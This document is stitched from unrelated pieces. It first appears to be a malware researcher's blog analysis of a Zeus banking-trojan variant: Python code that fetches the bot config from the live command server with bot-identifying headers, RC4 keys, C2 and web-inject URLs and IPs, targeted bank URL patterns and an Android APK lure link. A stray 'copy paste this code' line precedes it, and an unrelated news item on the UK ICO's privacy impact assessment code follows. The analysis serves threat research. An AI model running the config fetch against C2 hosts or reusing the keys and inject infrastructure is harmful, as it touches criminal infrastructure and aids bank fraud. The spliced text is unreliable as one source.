To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Zeus 1.1.3.4

RSA FirstWatch throw me recently a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.
But wait, it communicates over SSL and had a new kind of HTTP request pattern:

Fiddler:

Config download in python:
import urllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')
request.add_header('X_OS', '510')
request.add_header('X_BV', '1.1.3.4')
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'w').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The answer of the server have X_ID as cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, here again nothing new, regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've wrote a small yara rule in hope to see more of these.
All configs that i grabbed was reporting to localhost not to a server...





UK ICO Publishes Updated Code of Practice on Privacy Impact Assessments

On February 25, 2014, the UK Information Commissioner’s Office (“ICO”) published an updated code of practice on conducting privacy impact assessments (“PIAs”) (the “Code”). The updated Code takes into account the ICO’s consultation and research project on the conduct of PIAs, and reflects the increased use of PIAs in practice.

Under the UK Data Protection Act 1998 (the “Act”), organizations are not subject to any statutory requirement to conduct PIAs. However, the ICO promotes PIAs as a useful good practice tool to help manage compliance with key obligations under the Act, including fair and lawful processing, purpose limitation, data quality and minimization, security safeguards, international data transfers, and individuals’ rights in relation to their personal data. In the ICO’s view, organizations that choose to conduct PIAs are better able to identify data protection compliance issues early on, thereby avoiding potential costs and associated reputational damage that might otherwise occur. The ICO also emphasizes that PIAs are an “integral” part of privacy by design. Even if a detailed PIA is not required by law, the ICO recommends that organizations nevertheless conduct a legal compliance check against the requirements of the Act.

The ICO considers its PIA methodology to be sufficiently flexible, so it can be used by all types of organizations and be integrated with existing compliance practices. The Code emphasizes that there is no one-size-fits-all approach for PIAs, and that each organization is “best placed to determine how it considers the issue of privacy risks,” emphasizing that “conducting a PIA does not have to be complex or time consuming but there must be a level of rigor in proportion to the privacy risks arising.” The Code stresses that consultation is an important part of a PIA. In particular, effective internal consultation is key; without the involvement of relevant stakeholders, privacy risks are likely to remain unmitigated.

The Code provides examples of the types of projects that may benefit from a PIA, including new IT systems, data sharing initiatives, profiling, surveillance systems and using existing personal data for new and unexpected (or potentially intrusive) purposes. Annex 1 to the Code provides example screening questions that organizations may use to determine whether a substantive PIA is required, including questions relating to new uses of existing data sets, and the use of technologies that may be perceived as being particularly invasive (for example, facial recognition technology). Annex 3 provides example PIA questions linked to the eight Data Protection Principles contained in the Act. For example, for Principle 3 (personal data shall be adequate, relevant and not excessive in relation to the purpose(s) for which they are processed), the Code suggests asking, “[w]hich personal data could you not use, without compromising the needs of the project?”

Finally, the ICO encourages organizations to publish their PIAs to improve transparency and to improve individuals’ understanding of the ways in which their personal data are used.